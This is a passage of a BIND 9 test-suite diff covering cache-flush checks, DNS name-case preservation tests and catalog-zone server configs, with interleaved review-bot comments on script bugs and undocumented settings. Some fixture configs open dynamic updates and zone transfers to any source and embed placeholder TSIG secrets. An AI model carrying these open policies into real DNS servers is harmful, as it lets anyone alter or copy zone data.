individual nodes (leaf node, under the interior node) ($n)" +ret=0 +# leaf node, under the interior node (should still exist) +in_cache txt third2.second1.top1.flushtest.example || ret=1 +$RNDC $RNDCOPTS flushname third2.second1.top1.flushtest.example +in_cache txt third2.second1.top1.flushtest.example && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check flushing of individual nodes (another leaf node, with both positive and negative cache entries) ($n)" +ret=0 +# another leaf node, with both positive and negative cache entries +in_cache a third1.second1.top1.flushtest.example || ret=1 +in_cache txt third1.second1.top1.flushtest.example || ret=1 +$RNDC $RNDCOPTS flushname third1.second1.top1.flushtest.example +in_cache a third1.second1.top1.flushtest.example && ret=1 +in_cache txt third1.second1.top1.flushtest.example && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check flushing a nonexistent name ($n)" +ret=0 +$RNDC $RNDCOPTS flushname fake.flushtest.example || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check flushing of namespaces ($n)" +ret=0 +clear_cache +load_cache +# flushing leaf node should leave the interior node: +in_cache txt third1.second1.top1.flushtest.example || ret=1 +in_cache txt top1.flushtest.example || ret=1 +$RNDC $RNDCOPTS flushtree third1.second1.top1.flushtest.example +in_cache txt third1.second1.top1.flushtest.example && ret=1 +in_cache txt top1.flushtest.example || ret=1 +in_cache txt second1.top1.flushtest.example || ret=1 +in_cache txt third2.second1.top1.flushtest.example || ret=1 +$RNDC $RNDCOPTS flushtree second1.top1.flushtest.example +in_cache txt top1.flushtest.example || ret=1 +in_cache txt second1.top1.flushtest.example && ret=1 +in_cache txt third2.second1.top1.flushtest.example && ret=1 + +# flushing from an empty node should still remove 
all its children +in_cache txt second1.top2.flushtest.example || ret=1 +$RNDC $RNDCOPTS flushtree top2.flushtest.example +in_cache txt second1.top2.flushtest.example && ret=1 +in_cache txt second2.top2.flushtest.example && ret=1 +in_cache txt second3.top2.flushtest.example && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check flushing a nonexistent namespace ($n)" +ret=0 +$RNDC $RNDCOPTS flushtree fake.flushtest.example || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check the number of cached records remaining ($n)" +ret=0 +dump_cache +nrecords=`filter_tree flushtest.example ns2/named_dump.db.test$n | grep -v '^;' | grep -E '(TXT|ANY)' | wc -l` +[ $nrecords -eq 17 ] || { ret=1; echo_i "found $nrecords records expected 17"; } +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check the check that flushname of a partial match works ($n)" +ret=0 +in_cache txt second2.top1.flushtest.example || ret=1 +$RNDC $RNDCOPTS flushtree example +in_cache txt second2.top1.flushtest.example && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check the number of cached records remaining ($n)" +ret=0 +dump_cache +nrecords=`filter_tree flushtest.example ns2/named_dump.db.test$n | grep -E '(TXT|ANY)' | wc -l` +[ $nrecords -eq 1 ] || { ret=1; echo_i "found $nrecords records expected 1"; } +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check flushtree clears adb correctly ($n)" +ret=0 +load_cache +dump_cache +mv ns2/named_dump.db.test$n ns2/named_dump.db.test$n.a +sed -n '/plain success\/timeout/,/Unassociated entries/p' \ + ns2/named_dump.db.test$n.a > sed.out.$n.a +grep 'plain success/timeout' sed.out.$n.a > /dev/null 2>&1 || ret=1 +grep 'Unassociated entries' sed.out.$n.a > /dev/null 2>&1 || ret=1 
+grep 'ns.flushtest.example' sed.out.$n.a > /dev/null 2>&1 || ret=1 +$RNDC $RNDCOPTS flushtree flushtest.example || ret=1 +dump_cache +mv ns2/named_dump.db.test$n ns2/named_dump.db.test$n.b +sed -n '/plain success\/timeout/,/Unassociated entries/p' \ + ns2/named_dump.db.test$n.b > sed.out.$n.b +grep 'plain success/timeout' sed.out.$n.b > /dev/null 2>&1 || ret=1 +grep 'Unassociated entries' sed.out.$n.b > /dev/null 2>&1 || ret=1 +grep 'ns.flushtest.example' sed.out.$n.b > /dev/null 2>&1 && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check expire option returned from primary zone ($n)" +ret=0 +$DIG @10.53.0.1 -p ${PORT} +expire soa expire-test > dig.out.expire +grep EXPIRE: dig.out.expire > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check expire option returned from secondary zone ($n)" +ret=0 +$DIG @10.53.0.2 -p ${PORT} +expire soa expire-test > dig.out.expire +grep EXPIRE: dig.out.expire > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/case/clean.sh b/bin/tests/system/case/clean.sh new file mode 100644 index 0000000..2c7bf97 --- /dev/null +++ b/bin/tests/system/case/clean.sh 
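Review bot: `in_cache` reports success when dig returns nothing: if the fallback `+noanswer +auth` query also leaves `ttl` empty, `[ "$ttl" -ge 3599 ]` fails with a non-integer error, `&& return 1` is skipped and the function falls through to `return 0`. Every `in_cache ... || ret=1` check therefore passes when the server is unreachable or the reply carries no records, and a reply with several records (several TTLs from awk) takes the same path. Guard each `-ge` comparison by treating a non-numeric value as a failed check, e.g. `case "$ttl" in ''|*[!0-9]*) echo_i "in_cache: no TTL for $*"; ret=1; return 1 ;; esac`.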
@@ -0,0 +1,24 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+rm -f dig.ns*.test*
+rm -f ns*/named.conf
+rm -f ns*/named.lock
+rm -f ns*/named.memstats
+rm -f ns*/named.run
+rm -f ns1/dynamic.db
+rm -f ns1/dynamic.db.jnl
+rm -f ns2/dynamic.bk
+rm -f ns2/dynamic.bk.jnl
+rm -f ns2/example.bk
+rm -f ns*/managed-keys.bind*
diff --git a/bin/tests/system/case/dynamic.good b/bin/tests/system/case/dynamic.good
new file mode 100644
index 0000000..66f8afd
--- /dev/null
+++ b/bin/tests/system/case/dynamic.good
@@ -0,0 +1,6 @@
+DyNaMiC. 300 IN SOA mname1. . 2000042407 20 20 1814400 3600
+DyNaMiC. 300 IN NS ns1.DYNAMIC.
+DynamiC. 300 IN MX 0 mail.eXaMpLe.
+mAiL.DynamiC. 300 IN A 10.53.0.1
+ns1.DYNAMIC. 300 IN A 10.53.0.1
+DyNaMiC. 300 IN SOA mname1. . 2000042407 20 20 1814400 3600
diff --git a/bin/tests/system/case/ns1/dynamic.db.in b/bin/tests/system/case/ns1/dynamic.db.in
new file mode 100644
index 0000000..b39b519
--- /dev/null
+++ b/bin/tests/system/case/ns1/dynamic.db.in
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+$ORIGIN DyNaMiC.
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+$ORIGIN DYNAMIC.
+ NS ns1
+ns1 A 10.53.0.1
+$ORIGIN DynamiC.
+@ MX 0 mail.eXaMpLe.
+mAiL A 10.53.0.1
diff --git a/bin/tests/system/case/ns1/example.db b/bin/tests/system/case/ns1/example.db
new file mode 100644
index 0000000..b58414c
--- /dev/null
+++ b/bin/tests/system/case/ns1/example.db
@@ -0,0 +1,23 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns1
+ns1 A 10.53.0.1
+@ MX 0 mail.eXaMpLe.
+mAiL A 10.53.0.1
diff --git a/bin/tests/system/case/ns1/named.conf.in b/bin/tests/system/case/ns1/named.conf.in
new file mode 100644
index 0000000..076b9d0
--- /dev/null
+++ b/bin/tests/system/case/ns1/named.conf.in
@@ -0,0 +1,40 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+ ixfr-from-differences yes;
+ check-integrity no;
+ minimal-responses no;
+};
+
+zone "example" {
+ type primary;
+ file "example.db";
+ also-notify { 10.53.0.2; };
+};
+
+zone "dynamic" {
+ type primary;
+ file "dynamic.db";
+ allow-update { any; };
+ also-notify { 10.53.0.2; };
+};
diff --git a/bin/tests/system/case/ns2/named.conf.in b/bin/tests/system/case/ns2/named.conf.in
new file mode 100644
index 0000000..0a5c76f
--- /dev/null
+++ b/bin/tests/system/case/ns2/named.conf.in
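Review bot: `allow-update { any; };` on zone "dynamic" accepts unsigned dynamic updates from any source, and nothing in the file says that this is deliberate. case/tests.sh sends its `$NSUPDATE` requests without a key, so the open policy is needed for the test, but that reason belongs next to the option, e.g. `/* test fixture: tests.sh sends unsigned updates */`. The same comment is missing on the `allow-update { any; }` and `allow-transfer { any; }` lines in catz/ns1/named.conf.in and catz/ns3/named.conf.in.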
@@ -0,0 +1,40 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+ ixfr-from-differences yes;
+ check-integrity no;
+ no-case-compress { 10.53.0.2; };
+ minimal-responses no;
+};
+
+zone "example" {
+ type secondary;
+ file "example.bk";
+ primaries { 10.53.0.1; };
+};
+
+zone "dynamic" {
+ type secondary;
+ file "dynamic.bk";
+ primaries { 10.53.0.1; };
+};
diff --git a/bin/tests/system/case/postns1.good b/bin/tests/system/case/postns1.good
new file mode 100644
index 0000000..fcb3f9c
--- /dev/null
+++ b/bin/tests/system/case/postns1.good
@@ -0,0 +1,6 @@
+dYNAMIc. 300 IN SOA mname1. . 2000042409 20 20 1814400 3600
+DyNaMiC. 300 IN NS ns1.DYNAMIC.
+DynamiC. 300 IN MX 0 mail.eXaMpLe.
+mAiL.DynamiC. 300 IN A 10.53.0.1
+Ns1.DyNaMIC. 300 IN A 10.53.0.1
+dYNAMIc. 300 IN SOA mname1. . 2000042409 20 20 1814400 3600
diff --git a/bin/tests/system/case/postupdate.good b/bin/tests/system/case/postupdate.good
new file mode 100644
index 0000000..7755928
--- /dev/null
+++ b/bin/tests/system/case/postupdate.good
@@ -0,0 +1,6 @@
+dYNAMIc. 300 IN SOA mname1. . 2000042408 20 20 1814400 3600
+DyNaMiC. 300 IN NS ns1.DYNAMIC.
+DynamiC. 300 IN MX 0 mail.eXaMpLe.
+mAiL.DynamiC. 300 IN A 10.53.0.1
+ns1.DYNAMIC. 300 IN A 10.53.0.1
+dYNAMIc. 300 IN SOA mname1. . 2000042408 20 20 1814400 3600
diff --git a/bin/tests/system/case/setup.sh b/bin/tests/system/case/setup.sh
new file mode 100644
index 0000000..f691185
--- /dev/null
+++ b/bin/tests/system/case/setup.sh
@@ -0,0 +1,19 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+cp -f ns1/dynamic.db.in ns1/dynamic.db
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
diff --git a/bin/tests/system/case/tests.sh b/bin/tests/system/case/tests.sh
new file mode 100644
index 0000000..96e8924
--- /dev/null
+++ b/bin/tests/system/case/tests.sh
@@ -0,0 +1,150 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="+tcp +nosea +nostat +noquest +nocomm +nocmd -p ${PORT}" + +wait_for_serial() ( + $DIG $DIGOPTS "@$1" "$2" SOA > "$4" + serial=$(awk '$4 == "SOA" { print $7 }' "$4") + [ "$3" -eq "${serial:--1}" ] +) + +status=0 +n=0 + +n=`expr $n + 1` +echo_i "waiting for zone transfer to complete ($n)" +ret=0 +for i in 1 2 3 4 5 6 7 8 9 +do + $DIG $DIGOPTS soa example. @10.53.0.2 > dig.ns2.test$n + grep SOA dig.ns2.test$n > /dev/null && break + sleep 1 +done +for i in 1 2 3 4 5 6 7 8 9 +do + $DIG $DIGOPTS soa dynamic. @10.53.0.2 > dig.ns2.test$n + grep SOA dig.ns2.test$n > /dev/null && break + sleep 1 +done + +n=`expr $n + 1` +echo_i "testing case preserving responses - no acl ($n)" +ret=0 +$DIG $DIGOPTS mx example. @10.53.0.1 > dig.ns1.test$n +grep "0.mail.eXaMpLe" dig.ns1.test$n > /dev/null || ret=1 +grep "mAiL.example" dig.ns1.test$n > /dev/null || ret=1 +test $ret -eq 0 || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "testing no-case-compress acl '{ 10.53.0.2; }' ($n)" +ret=0 + +# check that we preserve zone case for non-matching query (10.53.0.1) +$DIG $DIGOPTS mx example. -b 10.53.0.1 @10.53.0.1 > dig.ns1.test$n +grep "0.mail.eXaMpLe" dig.ns1.test$n > /dev/null || ret=1 +grep "mAiL.example" dig.ns1.test$n > /dev/null || ret=1 + +# check that we don't preserve zone case for match (10.53.0.2) +$DIG $DIGOPTS mx example. 
-b 10.53.0.2 @10.53.0.2 > dig.ns2.test$n +grep "0.mail.example" dig.ns2.test$n > /dev/null || ret=1 +grep "mail.example" dig.ns2.test$n > /dev/null || ret=1 + +test $ret -eq 0 || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "testing load of dynamic zone with various \$ORIGIN values ($n)" +ret=0 +$DIG $DIGOPTS axfr dynamic @10.53.0.1 > dig.ns1.test$n +digcomp dig.ns1.test$n dynamic.good || ret=1 + +test $ret -eq 0 || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "transfer of dynamic zone with various \$ORIGIN values ($n)" +ret=0 +$DIG $DIGOPTS axfr dynamic @10.53.0.2 > dig.ns2.test$n +digcomp dig.ns2.test$n dynamic.good || ret=1 + +test $ret -eq 0 || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "change SOA owner case via update ($n)" +$NSUPDATE << EOF +server 10.53.0.1 ${PORT} +zone dynamic +update add dYNAMIc 0 SOA mname1. . 2000042408 20 20 1814400 3600 +send +EOF +$DIG $DIGOPTS axfr dynamic @10.53.0.1 > dig.ns1.test$n +digcomp dig.ns1.test$n postupdate.good || ret=1 + +test $ret -eq 0 || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +ret=0 +echo_i "wait for zone to transfer ($n)" +retry_quiet 20 wait_for_serial 10.53.0.2 dynamic 2000042408 dig.ns2.test$n || ret=1 + +test $ret -eq 0 || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check SOA owner case is transferred to secondary ($n)" +ret=0 +$DIG $DIGOPTS axfr dynamic @10.53.0.2 > dig.ns2.test$n +digcomp dig.ns2.test$n postupdate.good || ret=1 + +test $ret -eq 0 || echo_i "failed" +status=`expr $status + $ret` + +#update delete Ns1.DyNaMIC. 300 IN A 10.53.0.1 +n=`expr $n + 1` +echo_i "change A record owner case via update ($n)" +$NSUPDATE << EOF +server 10.53.0.1 ${PORT} +zone dynamic +update add Ns1.DyNaMIC. 
300 IN A 10.53.0.1 +send +EOF +$DIG $DIGOPTS axfr dynamic @10.53.0.1 > dig.ns1.test$n +digcomp dig.ns1.test$n postns1.good || ret=1 + +test $ret -eq 0 || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +ret=0 +echo_i "wait for zone to transfer ($n)" +retry_quiet 20 wait_for_serial 10.53.0.2 dynamic 2000042409 dig.ns2.test$n || ret=1 + +test $ret -eq 0 || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check A owner case is transferred to secondary ($n)" +ret=0 +$DIG $DIGOPTS axfr dynamic @10.53.0.2 > dig.ns2.test$n +digcomp dig.ns2.test$n postns1.good || ret=1 +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/catz/clean.sh b/bin/tests/system/catz/clean.sh new file mode 100644 index 0000000..b021f3b --- /dev/null +++ b/bin/tests/system/catz/clean.sh @@ -0,0 +1,32 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f dig.out.* +rm -f ns*/*.jnl +rm -f ns*/*.nzf +rm -f ns*/named.lock +rm -f ns*/named.memstats +rm -f ns*/named.conf +rm -f ns*/named.run +rm -f ns*/named.run.prev +rm -f ns1/*dom*example.db +rm -f ns2/__catz__*db +rm -f ns2/named.conf.tmp +rm -f ns3/dom13.example.db ns3/dom14.example.db +rm -f ns4/catalog-self.example.db +rm -f nsupdate.out.* +rm -f ns[123]/catalog[1234].example.db +rm -rf ns2/zonedir +rm -f ns*/*.nzd ns*/*.nzd-lock +rm -f ns*/managed-keys.bind* +rm -f wait_for_message.* diff --git a/bin/tests/system/catz/ns1/catalog.example.db.in b/bin/tests/system/catz/ns1/catalog.example.db.in new file mode 100644 index 0000000..a0bab0d --- /dev/null 
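Review bot: The two update steps in case/tests.sh, "change SOA owner case via update" and "change A record owner case via update", never reset `ret` and never check the exit status of `$NSUPDATE`. A failure in the preceding check is therefore added to `status` a second time, and a rejected update only shows up indirectly through the later `digcomp`. Add `ret=0` after each of those `echo_i` lines and append `|| ret=1` to the `$NSUPDATE << EOF` line. The first step, "waiting for zone transfer to complete", also leaves `ret` at 0 when both loops run out, and the final check lacks the `test $ret -eq 0 || echo_i "failed"` line that the others have.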
+++ b/bin/tests/system/catz/ns1/catalog.example.db.in
@@ -0,0 +1,14 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ 3600 SOA . . 1 86400 3600 86400 3600
+@ 3600 IN NS invalid.
+version IN TXT "1"
diff --git a/bin/tests/system/catz/ns1/named.conf.in b/bin/tests/system/catz/ns1/named.conf.in
new file mode 100644
index 0000000..b64b4d5
--- /dev/null
+++ b/bin/tests/system/catz/ns1/named.conf.in
@@ -0,0 +1,72 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+include "../../common/rndc.key";
+
+controls {
+ inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ allow-new-zones yes;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on port @EXTRAPORT1@ { 10.53.0.1; };
+ listen-on-v6 { none; };
+ notify no;
+ recursion no;
+ allow-transfer { any; };
+};
+
+zone "catalog1.example" {
+ type primary;
+ file "catalog1.example.db";
+ allow-transfer { any; };
+ allow-update { any; };
+ also-notify { 10.53.0.2; };
+ notify explicit;
+};
+
+zone "catalog3.example" {
+ type primary;
+ file "catalog3.example.db";
+ allow-transfer { any; };
+ allow-update { any; };
+ also-notify { 10.53.0.2; };
+ notify explicit;
+};
+
+zone "catalog4.example" {
+ type primary;
+ file "catalog4.example.db";
+ allow-transfer { any; };
+ allow-update { any; };
+ also-notify { 10.53.0.2; };
+ notify explicit;
+};
+
+/* catalog5 is missing on purpose */
+
+key tsig_key. {
+ secret "LSAnCU+Z";
+ algorithm @DEFAULT_HMAC@;
+};
+
+key next_key. {
+ secret "LaAnCU+Z";
+ algorithm @DEFAULT_HMAC@;
+};
diff --git a/bin/tests/system/catz/ns2/named1.conf.in b/bin/tests/system/catz/ns2/named1.conf.in
new file mode 100644
index 0000000..38381eb
--- /dev/null
+++ b/bin/tests/system/catz/ns2/named1.conf.in
@@ -0,0 +1,98 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+include "../../common/rndc.key";
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { fd92:7065:b8e:ffff::2; };
+ notify no;
+ recursion no;
+ serial-query-rate 100;
+ catalog-zones {
+ zone "catalog1.example"
+ default-masters { 10.53.0.1; }
+ in-memory no
+ zone-directory "zonedir";
+ zone "catalog2.example"
+ default-masters { 10.53.0.1 port @EXTRAPORT1@; }
+ in-memory yes;
+ zone "catalog3.example"
+ default-masters { 10.53.0.1; }
+ zone-directory "nonexistent";
+#T1 zone "catalog4.example"
+#T1 default-masters { 10.53.0.1; };
+#T2 zone "catalog5.example"
+#T2 default-masters { 10.53.0.1; };
+ };
+};
+
+# A faulty dlz configuration to check if named and catz survive a certain class
+# of failed configuration attempts (see GL #3060).
+# We use "dlz" because the dlz processing code is located in an ideal place in
+# the view configuration function for the test to cover the view reverting code.
+#T3dlz "bad-dlz" {
+#T3 database "dlopen bad-dlz.so example.org";
+#T3};
+
+zone "catalog1.example" {
+ type secondary;
+ file "catalog1.example.db";
+ primaries { 10.53.0.1; };
+};
+
+zone "catalog2.example" {
+ type secondary;
+ file "catalog2.example.db";
+ primaries { 10.53.0.3; };
+};
+
+zone "catalog3.example" {
+ type secondary;
+ file "catalog3.example.db";
+ primaries { 10.53.0.1; };
+};
+
+zone "catalog4.example" {
+ type secondary;
+ file "catalog4.example.db";
+ primaries { 10.53.0.1; };
+};
+
+# When the following zone configuration is enabled, "dom3.example" should
+# already exist as a member of "catalog1.example", and named should be able
+# to deal with that situation (see GL #3911). Make sure that this duplicate
+# zone comes after the the "catalog1.example" zone in the configuration file.
+#T4zone "dom3.example" {
+#T4 type secondary;
+#T4 file "dom2.example.db";
+#T4};
+
+key tsig_key. {
+ secret "LSAnCU+Z";
+ algorithm @DEFAULT_HMAC@;
+};
+
+key next_key. {
+ secret "LaAnCU+Z";
+ algorithm @DEFAULT_HMAC@;
+};
diff --git a/bin/tests/system/catz/ns2/named2.conf.in b/bin/tests/system/catz/ns2/named2.conf.in
new file mode 100644
index 0000000..c167310
--- /dev/null
+++ b/bin/tests/system/catz/ns2/named2.conf.in
@@ -0,0 +1,62 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+include "../../common/rndc.key";
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { fd92:7065:b8e:ffff::2; };
+ notify no;
+ recursion no;
+ serial-query-rate 100;
+ # removed catalog-zone option, otherwise this is
+ # identical to named1.conf.in
+};
+
+zone "catalog1.example" {
+ type secondary;
+ file "catalog1.example.db";
+ primaries { 10.53.0.1; };
+};
+
+zone "catalog2.example" {
+ type secondary;
+ file "catalog2.example.db";
+ primaries { 10.53.0.3; };
+};
+
+zone "catalog3.example" {
+ type secondary;
+ file "catalog3.example.db";
+ primaries { 10.53.0.1; };
+};
+
+zone "catalog4.example" {
+ type secondary;
+ file "catalog4.example.db";
+ primaries { 10.53.0.1; };
+};
+
+key tsig_key. {
+ secret "LSAnCU+Z";
+ algorithm @DEFAULT_HMAC@;
+};
diff --git a/bin/tests/system/catz/ns3/catalog.example.db.in b/bin/tests/system/catz/ns3/catalog.example.db.in
new file mode 100644
index 0000000..eccb4f1
--- /dev/null
+++ b/bin/tests/system/catz/ns3/catalog.example.db.in
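Review bot: The comment inside `options` says this file is identical to named1.conf.in apart from the removed catalog-zone option, but it also drops the `key next_key.` block and the `#T3`/`#T4` template sections that named1.conf.in carries. If that is intended, the comment should say so, e.g. `# catalog-zones, next_key and the #T3/#T4 blocks are removed; the rest matches named1.conf.in`. If it is not, restore `next_key` so that any step relying on that key behaves the same after the configuration is swapped.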
@@ -0,0 +1,14 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ 3600 SOA . . 2670950424 86400 3600 86400 3600
+@ 3600 IN NS invalid.
+version IN TXT "1"
diff --git a/bin/tests/system/catz/ns3/dom5.example.db b/bin/tests/system/catz/ns3/dom5.example.db
new file mode 100644
index 0000000..5779aaf
--- /dev/null
+++ b/bin/tests/system/catz/ns3/dom5.example.db
@@ -0,0 +1,13 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ 3600 IN SOA . . 1 3600 3600 3600 3600
